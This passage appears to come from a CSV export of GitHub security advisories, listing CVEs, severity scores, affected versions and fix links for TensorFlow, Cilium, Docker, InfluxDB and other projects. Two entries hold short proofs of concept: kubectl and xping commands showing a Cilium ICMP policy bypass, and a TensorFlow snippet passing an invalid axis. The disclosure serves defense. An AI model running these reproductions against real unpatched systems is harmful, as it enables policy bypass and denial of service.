['tensorflow.strings.substr']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mmq6-q8r3-48fm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29617'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/890f7164b70354c57d40eda52dcdd7658677c09f'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/issues/46900'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/issues/46974'}]","{'cwe_ids': ['CWE-755'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:16:27Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-3f8r-4qwm-r7jf,2021-10-13T17:25:40Z,2021-05-18T15:39:16Z,,['CVE-2019-12405'],Improper Authentication in Apache Traffic Control,"Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/apache/trafficcontrol'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2-RC1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12405'}, {'type': 'WEB', 'url': 'https://github.com/apache/trafficcontrol/commit/f780aff77a52d52a37b4d1cc3e8e801c0b557356'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/trafficcontrol'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/e128e9d382f3b0d074e2b597ac58e1d92139394509d81ddbc9e3700e@%3Cusers.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c675031ac220b5eae64a9c84a03ee60045c6045738607dca4a96cb8@%3Ccommits.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8bfd7d4f71d61e9193efcd4699eccbab3c202ec1d75ed9d502f08bf@%3Ccommits.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://support.f5.com/csp/article/K84141859'}, {'type': 'WEB', 'url': 'https://support.f5.com/csp/article/K84141859?utm_source=f5support&utm_medium=RSS'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:00:28Z', 'nvd_published_at': '2019-09-09T17:15:00Z'}" +1.4.0,GHSA-c66w-hq56-4q97,2021-05-21T14:09:14Z,2021-05-21T14:32:37Z,,[],Network policy may be bypassed by some ICMP Echo Requests,"## Impact + +Under certain conditions, ICMP Echo Request sent to a Cilium endpoint from an actor may bypass a network policy which _disallows_ access from the actor to the endpoint, but _allows_ from the endpoint to the actor. This does _NOT_ apply to UDP and TCP traffic. + +The actor is either a pod or a cluster host or a remote host. + +The following conditions must be met: +1. Network policies have been created which: + a) do not allow access from the actor to the endpoint; + b) allow access from the endpoint to the actor and does not specify neither protocol nor port. +2. The endpoint has sent ICMP Echo Request to the actor with the ICMP identifier X. +3. The actor sends ICMP Echo Request to the endpoint with the same ICMP identifier X. +4. The request from the actor (3.) is sent before the Cilium's conntrack GC has removed the previously created conntrack entry (2.). + +## Detailed description + +See https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e (v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79 (v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37 (v1.7.x). + +## Example + +``` +$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600 +$ kubectl run client --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600 +$ cat <server +spec: + podSelector: + matchLabels: + run: server + ingress: + - from: + - podSelector: + matchLabels: + run: client + policyTypes: + - Ingress +--- +apiVersion: networking.k8s.io/v1 +kind: NetworkPolicy +metadata: + name: client-netpol # deny any->client +spec: + podSelector: + matchLabels: + run: client + policyTypes: + - Ingress +EOF + +$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP +PING 10.154.0.50 (10.154.0.50): 56 data bytes +^C +--- 10.154.0.50 ping statistics --- +1 packets transmitted, 0 packets received, 100% packet loss <--- ""client-netpol"" policy denied +command terminated with exit code 1 + +$ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP +PING 10.154.1.16 (10.154.1.16): 56 data bytes +64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822 ms + +--- 10.154.1.16 ping statistics --- +1 packets transmitted, 1 packets received, 0% packet loss <--- ""server-netpol"" policy allowed +round-trip min/avg/max = 0.822/0.822/0.822 ms + +$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP +PING 10.154.0.50 (10.154.0.50): 56 data bytes +64 bytes from 10.154.0.50: seq=0 ttl=60 time=0.527 ms + +--- 10.154.0.50 ping statistics --- +1 packets transmitted, 1 packets received, 0% packet loss <--- ""client-netpol"" policy bypassed +round-trip min/avg/max = 0.527/0.527/0.527 ms +``` + +## For more information + +If you have any questions or comments about this advisory: + +- Open an issue in [Cilium Issues](https://github.com/cilium/cilium/issues) +- Email us at security@cilium.io",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.8'}, {'fixed': '1.7.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.7.14'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.3'}, {'fixed': '1.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.8.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.9.4'}}]","[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-c66w-hq56-4q97'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T14:09:14Z', 'nvd_published_at': None}" +1.4.0,GHSA-6m8p-4fxj-pgc2,2021-05-11T19:56:27Z,2021-05-17T21:01:08Z,,['CVE-2020-7688'],OS Command Injection in mversion,The issue occurs because tagName user input is formatted inside the exec function is executed without any checks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mversion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.13.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7688'}, {'type': 'WEB', 'url': 'https://github.com/418sec/huntr/pull/102'}, {'type': 'WEB', 'url': 'https://github.com/mikaelbr/mversion/commit/b7a8b32600e60759a7ad3921ec4a2750bf173482'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MVERSION-573174'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T19:56:27Z', 'nvd_published_at': '2020-07-01T17:15:00Z'}" +1.4.0,GHSA-vj3f-3286-r4pf,2021-05-17T21:28:16Z,2021-05-18T21:09:17Z,,['CVE-2014-9356'],Path Traversal in Docker,Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/docker/docker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/moby/moby'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-9356'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2014-9356'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1172761'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#%21msg/docker-user/nFAz-B-n4Bw/0wr3wvLsnUwJ'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/archive/1/archive/1/534215/100/0/threaded'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:28:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-h43v-26r7-7j4c,2023-09-29T15:55:50Z,2021-05-18T18:20:19Z,,['CVE-2020-7218'],Allocation of Resources Without Limits or Throttling in HashiCorp Nomad,"HashiCorp Nomad and Nomad Enterprise before 0.10.3 allow unbounded resource usage. + +### Specific Go Packages Affected +github.com/hashicorp/nomad/command/agent","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7218'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/nomad/issues/7002'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/nomad/pull/7022'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad/'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T15:03:56Z', 'nvd_published_at': '2020-01-31T13:15:00Z'}" +1.4.0,GHSA-8rf5-92jh-3vc9,2021-04-06T21:46:21Z,2021-05-13T22:31:32Z,,['CVE-2021-23900'],Uncaught Exception leading to Denial of Service in json-sanitizer,OWASP json-sanitizer before 1.2.2 can output invalid JSON or throw an undeclared exception for crafted input. This may lead to denial of service if the application is not prepared to handle these situations.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.mikesamuel:json-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23900'}, {'type': 'WEB', 'url': 'https://github.com/OWASP/json-sanitizer/commit/a37f594f7378a1c76b3283e0dab9e1ab1dc0247e'}, {'type': 'WEB', 'url': 'https://github.com/OWASP/json-sanitizer/compare/v1.2.1...v1.2.2'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/json-sanitizer-support/c/dAW1AeNMoA0'}]","{'cwe_ids': ['CWE-248'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:46:21Z', 'nvd_published_at': '2021-01-13T16:15:00Z'}" +1.4.0,GHSA-w4x5-jqq4-qc8x,2021-05-04T22:00:55Z,2021-05-18T18:27:43Z,,['CVE-2019-19026'],SQL Injection in Cloud Native Computing Foundation Harbor,Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via project quotas in the VMware Harbor Container Registry for the Pivotal Platform.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.8.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories/GHSA-rh89-vvrg-fg64'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19026'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2019-19026'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:00:55Z', 'nvd_published_at': '2020-03-20T03:15:00Z'}" +1.4.0,GHSA-rwxp-hwwf-653v,2023-04-04T17:30:41Z,2021-05-17T20:58:51Z,,['CVE-2021-32817'],Insecure template handling in express-hbs,"express-hbs is an Express handlebars template engine. express-hbs mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .hbs appended to them. For complete details refer to the referenced GHSL-2021-019 report. Notes in documentation have been added to help users of express-hbs avoid this potential information exposure vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'express-hbs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32817'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/express-hbs/commit/ff6fad6e357699412d4e916273314e5e7af1500e'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/express-hbs'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/express-hbs#%EF%B8%8F-this-creates-a-potential-security-vulnerability'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-019-express-hbs/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/express-hbs'}]","{'cwe_ids': ['CWE-200', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T19:09:07Z', 'nvd_published_at': '2021-05-14T19:15:00Z'}" +1.4.0,GHSA-4fcw-pq4r-f4q7,2021-05-05T19:53:13Z,2021-05-07T15:54:31Z,,['CVE-2020-9298'],Server-Side Request Forgery in Spinnaker Orca,"The Spinnaker template resolution functionality is vulnerable to Server-Side Request Forgery (SSRF), which allows an attacker to send requests on behalf of Spinnaker potentially leading to sensitive data disclosure.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.netflix.spinnaker.orca:orca-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9298'}, {'type': 'WEB', 'url': 'https://github.com/spinnaker/orca/pull/3706/commits/4f3c07da8fcacd67bb1984aef11b2066f2c0d11c'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2020-003.md'}, {'type': 'WEB', 'url': 'https://github.com/spinnaker/orca/releases/tag/v8.7.0'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:53:13Z', 'nvd_published_at': '2020-08-28T15:15:00Z'}" +1.4.0,GHSA-gmch-cm2p-9qw9,2021-04-21T18:19:08Z,2021-05-10T18:39:15Z,,['CVE-2020-7747'],Cross-site Scripting in lightning-server,This affects all versions of package lightning-server. It is possible to inject malicious JavaScript code as part of a session controller.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'lightning-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7747'}, {'type': 'WEB', 'url': 'https://github.com/lightning-viz/lightning/blob/master/app/controllers/session.js%23L230'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LIGHTNINGSERVER-1019381'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T18:19:08Z', 'nvd_published_at': '2020-10-20T11:15:00Z'}" +1.4.0,GHSA-2rmp-fw5r-j5qv,2022-10-20T13:55:19Z,2021-05-18T18:22:05Z,,['CVE-2019-20933'],Improper Authentication in InfluxDB,InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/influxdata/influxdb/services/httpd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20933'}, {'type': 'WEB', 'url': 'https://github.com/influxdata/influxdb/issues/12927'}, {'type': 'WEB', 'url': 'https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0'}, {'type': 'WEB', 'url': 'https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6'}, {'type': 'WEB', 'url': 'https://github.com/ticarpi/jwt_tool/blob/a6ca3e0524a204b5add070bc6874cb4e7e5a9864/jwt_tool.py#L1368'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/12/msg00030.html'}, {'type': 'PACKAGE', 'url': 'https://pkg.go.dev/github.com/influxdata/influxdb/services/httpd'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4823'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T21:55:56Z', 'nvd_published_at': '2020-11-19T02:15:00Z'}" +1.4.0,GHSA-6hwh-rqwf-cxxr,2021-07-28T18:36:56Z,2021-05-07T16:32:02Z,,['CVE-2019-10806'],Improperly Controlled Modification of Dynamically-Determined Object Attributes in vega-util,vega-util prior to 1.13.1 allows manipulation of object prototype. The 'vega.mergeConfig' method within vega-util could be tricked into adding or modifying properties of the Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'vega-util'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10806'}, {'type': 'WEB', 'url': 'https://github.com/vega/vega/commit/8f33a0b5170d7de4f12fc248ec0901234342367b'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VEGAUTIL-559223'}]","{'cwe_ids': ['CWE-1321', 'CWE-20', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-23T20:26:16Z', 'nvd_published_at': '2020-03-09T16:15:00Z'}" +1.4.0,GHSA-qcg2-h349-vwm3,2023-09-11T22:34:30Z,2021-05-06T15:52:35Z,,['CVE-2021-31712'],Cross-site Scripting in React Draft Wysiwyg,"react-draft-wysiwyg (aka React Draft Wysiwyg) before 1.14.6 allows a `javascript:` URi in a Link Target of the link decorator in `decorators/Link/index.js` when a draft is shared across users, leading to XSS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-draft-wysiwyg'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31712'}, {'type': 'WEB', 'url': 'https://github.com/jpuri/react-draft-wysiwyg/issues/1102'}, {'type': 'WEB', 'url': 'https://github.com/jpuri/react-draft-wysiwyg/pull/1104'}, {'type': 'WEB', 'url': 'https://github.com/jpuri/react-draft-wysiwyg/commit/d2faeb612b53f10dff048de7dc57e1f4044b5380'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-26T18:46:48Z', 'nvd_published_at': '2021-04-24T21:15:00Z'}" +1.4.0,GHSA-qr2j-wrhx-4829,2021-05-12T18:10:24Z,2021-05-18T18:38:06Z,,['CVE-2018-16733'],Improper Input Validation,"In Go Ethereum (aka geth) before 1.8.14, TraceChain in eth/api_tracer.go does not verify that the end block is after the start block.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum/eth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-16733'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/106d196ec4a6451efedc60ab15957f231fa85639'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T18:10:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-rrfw-hg9m-j47h,2021-10-08T21:25:26Z,2021-05-24T16:59:42Z,,[],Signature Validation Bypass,"### Impact + +An authentication bypass exists in the [goxmldsig](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7) this library uses to determine if SAML assertions are genuine. An attacker could craft a SAML response that would appear to be valid but would not have been genuinely issued by the IDP. + +### Patches + +Version 0.4.2 bumps the dependency which should fix the issue. + +### For more information + +Please see [the advisory in goxmldsig](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7) + +## Credits + +The original vulnerability was discovered by @jupenur. Thanks to @russellhaering for the heads up.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/russellhaering/goxmldsig'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.4.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/crewjam/saml/security/advisories/GHSA-rrfw-hg9m-j47h'}, {'type': 'PACKAGE', 'url': 'https://github.com/russellhaering/goxmldsig'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:23:03Z', 'nvd_published_at': None}" +1.4.0,GHSA-vfr4-x8j2-3rf9,2021-05-18T17:00:42Z,2021-05-21T14:26:48Z,,['CVE-2021-29588'],Division by zero in TFLite's implementation of `TransposeConv`,"### Impact +The optimized implementation of the `TransposeConv` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7/tensorflow/lite/kernels/internal/optimized/optimized_ops.h#L5221-L5222): + +```cc +int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; +int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; +``` + +An attacker can craft a model such that `stride_{h,w}` values are 0. Code calling this function must validate these arguments. + +### Patches +We have patched the issue in GitHub commit [801c1c6be5324219689c98e1bd3e0ca365ee834d](https://github.com/tensorflow/tensorflow/commit/801c1c6be5324219689c98e1bd3e0ca365ee834d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vfr4-x8j2-3rf9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29588'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/801c1c6be5324219689c98e1bd3e0ca365ee834d'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:00:42Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-733f-44f3-3frw,2023-08-30T11:07:54Z,2021-05-18T21:08:35Z,,['CVE-2020-12666'],gopkg.in/macaron.v1 Open redirect vulnerability,"macaron before 1.3.7 has an open redirect in the static handler. Due to improper request santization, a specifically crafted URL can cause the static file handler to redirect to an attacker chosen URL, allowing for open redirect attacks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'gopkg.in/macaron.v1'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12666'}, {'type': 'WEB', 'url': 'https://github.com/go-macaron/macaron/issues/198'}, {'type': 'WEB', 'url': 'https://github.com/go-macaron/macaron/issues/198#issuecomment-622885959'}, {'type': 'WEB', 'url': 'https://github.com/go-macaron/macaron/pull/199'}, {'type': 'WEB', 'url': 'https://github.com/go-macaron/macaron/pull/199/commits/6bd9385542f7133467ab7d09a5f28f7d5dc52af7'}, {'type': 'WEB', 'url': 'https://github.com/go-macaron/macaron/commit/addc7461c3a90a040e79aa75bfd245107a210245'}, {'type': 'PACKAGE', 'url': 'https://github.com/go-macaron/macaron'}, {'type': 'WEB', 'url': 'https://github.com/go-macaron/macaron/releases/tag/v1.3.7'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3QEUOHRC4EN4WZ66EVFML2UCV7ZQ63XZ/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0039'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:50:16Z', 'nvd_published_at': '2020-05-05T22:15:00Z'}" +1.4.0,GHSA-mq5c-prh3-3f3h,2021-05-17T22:05:10Z,2021-05-21T14:28:32Z,,['CVE-2021-29610'],Invalid validation in `QuantizeAndDequantizeV2`,"### Impact +The validation in `tf.raw_ops.QuantizeAndDequantizeV2` allows invalid values for `axis` argument: + +```python +import tensorflow as tf + +input_tensor = tf.constant([0.0], shape=[1], dtype=float) +input_min = tf.constant(-10.0) +input_max = tf.constant(-10.0) + +tf.raw_ops.QuantizeAndDequantizeV2( + input=input_tensor, input_min=input_min, input_max=input_max, + signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', + narrow_range=False, axis=-2) +``` + +The 